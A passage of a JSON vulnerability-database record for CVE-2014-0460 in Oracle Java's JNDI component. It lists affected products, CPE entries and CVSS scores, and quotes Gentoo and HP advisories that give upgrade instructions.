sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "cosminexus primary server base 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cosminexus application server standard )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "06-02" }, { "model": "runtimes for java technology sr16", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "cosminexus studio 05-00-/s", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer standard 06-70-/a (windows(ip", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "websphere transformation extender", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.40" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "ucosminexus application server express (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "ucosminexus service platform messaging", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-09-00" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "ucosminexus service platform messaging (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.34" }, { "model": "security directory server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.1" }, { "model": "ucosminexus application server express", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-00" }, { "model": "cosminexus application server 05-01-/l", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "09-50" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "linux enterprise server sp1 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "centos", "scope": "eq", "trust": 0.3, "vendor": "centos", "version": "5" }, { "model": "cosminexus application server", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "05-02" }, { "model": "ucosminexus application server standard 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "jdk 1.5.0 07-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "operational decision manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "cosminexus application server standard 06-51-/e", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus developer light (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-00" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.18" }, { "model": "cosminexus application server standard 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "cosminexus application server enterprise 06-51-/b", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform messaging )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "-08-20" }, { "model": "tivoli storage productivity center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2.2.145" }, { "model": "ucosminexus application server standard-r )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ucosminexus client 06-72-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus service platform (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "ts7720 virtualization engine 3957-vea", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ucosminexus service architect (solaris(sparc", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "lotus domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.0" }, { "model": "system networking switch center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2.111" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cosminexus application server enterprise 06-51-/n", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server smart edition )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "07-00" }, { "model": "websphere business events", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "cosminexus primary server base 06-02-/d", "scope": null, "trust": 0.3, "vendor": "hitachi", "version": null }, { "model": "smartcloud provisioning fixpack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.31" }, { "model": "ucosminexus operator )", "scope": "eq", "trust": 0.3, "vendor": "hitachi", "version": "08-20" }, { "model": "vcenter update manager", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" } ], "sources": [ { "db": "BID", "id": "66916" }, { "db": "CNNVD", "id": "CNNVD-201404-275" }, { "db": "NVD", "id": "CVE-2014-0460" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r27.8.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jrockit:r28.3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:13.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.10:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:10.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:juniper:junos_space:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndExcluding": "15.1", "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.7.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.7.0:update51:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.8.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.8.0:-:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.5.0:update61:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jdk:1.6.0:update71:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.5.0:update61:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:oracle:jre:1.6.0:update71:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:debian:debian_linux:6.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-0460" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Red Hat", "sources": [ { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126183" } ], "trust": 0.5 }, "cve": "CVE-2014-0460", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "impactScore": 4.9, "integrityImpact": "PARTIAL", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.6, "id": "VHN-67953", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-0460", "trust": 1.0, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201404-275", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-67953", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-67953" }, { "db": "CNNVD", "id": "CNNVD-201404-275" }, { "db": "NVD", "id": "CVE-2014-0460" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Unspecified vulnerability in Oracle Java SE 5.0u61, 6u71, 7u51, and 8; JRockit R27.8.1 and R28.3.1; and Java SE Embedded 7u51 allows remote attackers to affect confidentiality and integrity via vectors related to JNDI. \nThe vulnerability can be exploited over multiple protocols. This issue affects the \u0027JNDI\u0027 sub-component. Java SE (Java Platform Standard Edition) is used to develop and deploy Java applications on desktops, servers, and embedded devices and real-time environments; JRockit is a Java virtual machine built into Oracle Fusion Middleware; Java SE Embedded is a The Java platform for developing powerful, reliable, and portable applications for embedded systems. (CVE-2014-1876)\n\nNote: If the web browser plug-in provided by the icedtea-web package was\ninstalled, the issues exposed via Java applets could have been exploited\nwithout user interaction if a user visited a malicious website. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201502-12\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n http://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: Oracle JRE/JDK: Multiple vulnerabilities\n Date: February 15, 2015\n Bugs: #507798, #508716, #517220, #525464\n ID: 201502-12\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in Oracle\u0027s Java SE\nDevelopment Kit and Runtime Environment, the worst of which could lead\nto execution of arbitrary code. Please review the CVE\nidentifiers referenced below for details. \n\nImpact\n======\n\nA context-dependent attacker may be able to execute arbitrary code,\ndisclose, update, insert, or delete certain data. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll Oracle JRE 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jre-bin-1.7.0.71\"\n\nAll Oracle JDK 1.7 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot -v \"\u003e=dev-java/oracle-jdk-bin-1.7.0.71\"\n\nAll users of the precompiled 32-bit Oracle JRE should upgrade to the\nlatest version:\n\n # emerge --sync\n # emerge -a -1 -v \"\u003e=app-emulation/emul-linux-x86-java-1.7.0.71\"\n\nReferences\n==========\n\n[ 1 ] CVE-2014-0429\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0429\n[ 2 ] CVE-2014-0432\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0432\n[ 3 ] CVE-2014-0446\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0446\n[ 4 ] CVE-2014-0448\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0448\n[ 5 ] CVE-2014-0449\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0449\n[ 6 ] CVE-2014-0451\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0451\n[ 7 ] CVE-2014-0452\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0452\n[ 8 ] CVE-2014-0453\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0453\n[ 9 ] CVE-2014-0454\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0454\n[ 10 ] CVE-2014-0455\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0455\n[ 11 ] CVE-2014-0456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0456\n[ 12 ] CVE-2014-0457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0457\n[ 13 ] CVE-2014-0458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0458\n[ 14 ] CVE-2014-0459\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0459\n[ 15 ] CVE-2014-0460\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0460\n[ 16 ] CVE-2014-0461\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0461\n[ 17 ] CVE-2014-0463\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0463\n[ 18 ] CVE-2014-0464\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0464\n[ 19 ] CVE-2014-2397\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2397\n[ 20 ] CVE-2014-2398\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2398\n[ 21 ] CVE-2014-2401\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2401\n[ 22 ] CVE-2014-2402\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2402\n[ 23 ] CVE-2014-2403\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2403\n[ 24 ] CVE-2014-2409\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2409\n[ 25 ] CVE-2014-2410\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2410\n[ 26 ] CVE-2014-2412\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2412\n[ 27 ] CVE-2014-2413\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2413\n[ 28 ] CVE-2014-2414\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2414\n[ 29 ] CVE-2014-2420\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2420\n[ 30 ] CVE-2014-2421\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2421\n[ 31 ] CVE-2014-2422\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2422\n[ 32 ] CVE-2014-2423\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2423\n[ 33 ] CVE-2014-2427\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2427\n[ 34 ] CVE-2014-2428\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2428\n[ 35 ] CVE-2014-2483\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2483\n[ 36 ] CVE-2014-2490\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-2490\n[ 37 ] CVE-2014-4208\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4208\n[ 38 ] CVE-2014-4209\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4209\n[ 39 ] CVE-2014-4216\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4216\n[ 40 ] CVE-2014-4218\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4218\n[ 41 ] CVE-2014-4219\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4219\n[ 42 ] CVE-2014-4220\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4220\n[ 43 ] CVE-2014-4221\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4221\n[ 44 ] CVE-2014-4223\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4223\n[ 45 ] CVE-2014-4227\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4227\n[ 46 ] CVE-2014-4244\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4244\n[ 47 ] CVE-2014-4247\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4247\n[ 48 ] CVE-2014-4252\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4252\n[ 49 ] CVE-2014-4262\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4262\n[ 50 ] CVE-2014-4263\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4263\n[ 51 ] CVE-2014-4264\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4264\n[ 52 ] CVE-2014-4265\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4265\n[ 53 ] CVE-2014-4266\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4266\n[ 54 ] CVE-2014-4268\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4268\n[ 55 ] CVE-2014-4288\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-4288\n[ 56 ] CVE-2014-6456\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6456\n[ 57 ] CVE-2014-6457\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6457\n[ 58 ] CVE-2014-6458\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6458\n[ 59 ] CVE-2014-6466\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6466\n[ 60 ] CVE-2014-6468\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6468\n[ 61 ] CVE-2014-6476\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6476\n[ 62 ] CVE-2014-6485\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6485\n[ 63 ] CVE-2014-6492\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6492\n[ 64 ] CVE-2014-6493\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6493\n[ 65 ] CVE-2014-6502\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6502\n[ 66 ] CVE-2014-6503\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6503\n[ 67 ] CVE-2014-6504\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6504\n[ 68 ] CVE-2014-6506\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6506\n[ 69 ] CVE-2014-6511\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6511\n[ 70 ] CVE-2014-6512\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6512\n[ 71 ] CVE-2014-6513\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6513\n[ 72 ] CVE-2014-6515\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6515\n[ 73 ] CVE-2014-6517\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6517\n[ 74 ] CVE-2014-6519\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6519\n[ 75 ] CVE-2014-6527\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6527\n[ 76 ] CVE-2014-6531\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6531\n[ 77 ] CVE-2014-6532\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6532\n[ 78 ] CVE-2014-6558\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6558\n[ 79 ] CVE-2014-6562\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-6562\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n http://security.gentoo.org/glsa/glsa-201502-12.xml\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. In a typical operating environment, these are of low\nsecurity risk as the runtime is not used on untrusted applets. \n\nRelease Date: 2014-08-19\nLast Updated: 2014-08-19\n\nPotential Security Impact: Remote unauthorized access, disclosure of\ninformation, and other vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified in Java Runtime\nEnvironment (JRE) and Java Developer Kit (JDK) running on HP-UX. These\nvulnerabilities could allow remote unauthorized access, disclosure of\ninformation, and other vulnerabilities. \n\nReferences:\n\nCVE-2013-6629\n\nCVE-2013-6954\n\nCVE-2014-0432\n\nCVE-2014-0446\n\nCVE-2014-0448\n\nCVE-2014-0449\n\nCVE-2014-0451\n\nCVE-2014-0452\n\nCVE-2014-0453\n\nCVE-2014-0454\n\nCVE-2014-0455\n\nCVE-2014-0456\n\nCVE-2014-0458\n\nCVE-2014-0459\n\nCVE-2014-0460\n\nCVE-2014-0461\n\nCVE-2014-1876\n\nCVE-2014-2397\n\nCVE-2014-2398\n\nCVE-2014-2401\n\nCVE-2014-2402\n\nCVE-2014-2403\n\nCVE-2014-2409\n\nCVE-2014-2412\n\nCVE-2014-2413\n\nCVE-2014-2414\n\nCVE-2014-2420\n\nCVE-2014-2421\n\nCVE-2014-2422\n\nCVE-2014-2423\n\nCVE-2014-2427\n\nCVE-2014-2428\n\nCVE-2014-2483\n\nCVE-2014-2490\n\nCVE-2014-4208\n\nCVE-2014-4209\n\nCVE-2014-4216\n\nCVE-2014-4218\n\nCVE-2014-4220\n\nCVE-2014-4221\n\nCVE-2014-4223\n\nCVE-2014-4244\n\nCVE-2014-4252\n\nCVE-2014-4262\n\nCVE-2014-4263\n\nCVE-2014-4264\n\nCVE-2014-4265\n\nCVE-2014-4266\n\nCVE-2014-4268\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.23, and B.11.31 running HP JDK and JRE v7.0.09 and earlier. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2013-6629 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2013-6954 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-0432 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-0446 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2014-0449 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-0451 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0452 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0453 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-0454 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0455 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-0456 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-0458 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-0459 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3\nCVE-2014-0460 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8\nCVE-2014-0461 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-1876 (AV:L/AC:M/Au:N/C:P/I:P/A:P) 4.4\nCVE-2014-2397 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-2398 (AV:N/AC:M/Au:S/C:N/I:P/A:N) 3.5\nCVE-2014-2401 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-2402 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2403 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-2409 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2014-2412 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2413 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3\nCVE-2014-2414 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2420 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6\nCVE-2014-2421 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-2422 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8\nCVE-2014-2423 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2427 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5\nCVE-2014-2428 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6\nCVE-2014-2483 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-2490 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4208 (AV:N/AC:H/Au:N/C:N/I:P/A:N) 2.6\nCVE-2014-4209 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4\nCVE-2014-4216 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4218 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4220 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4221 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3\nCVE-2014-4223 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4244 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-4252 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\nCVE-2014-4262 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3\nCVE-2014-4263 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0\nCVE-2014-4264 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\nCVE-2014-4265 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4266 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0\nCVE-2014-4268 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following Java version upgrade to resolve these\nvulnerabilities. \n\nThe upgrade is available from the following location: http://www.hp.com/java\n\nOS Version\n Release Version\n Depot Name\n\nHP-UX B.11.23, B.11.31\n JDK and JRE v7.0.10 or subsequent\n Itanium_JDK_JRE_7.0.10_Aug_2014_Java70_1.7.0.10.00_HP-UX_B.11.31_IA.depot\n\nMANUAL ACTIONS: Yes - Update\nFor Java 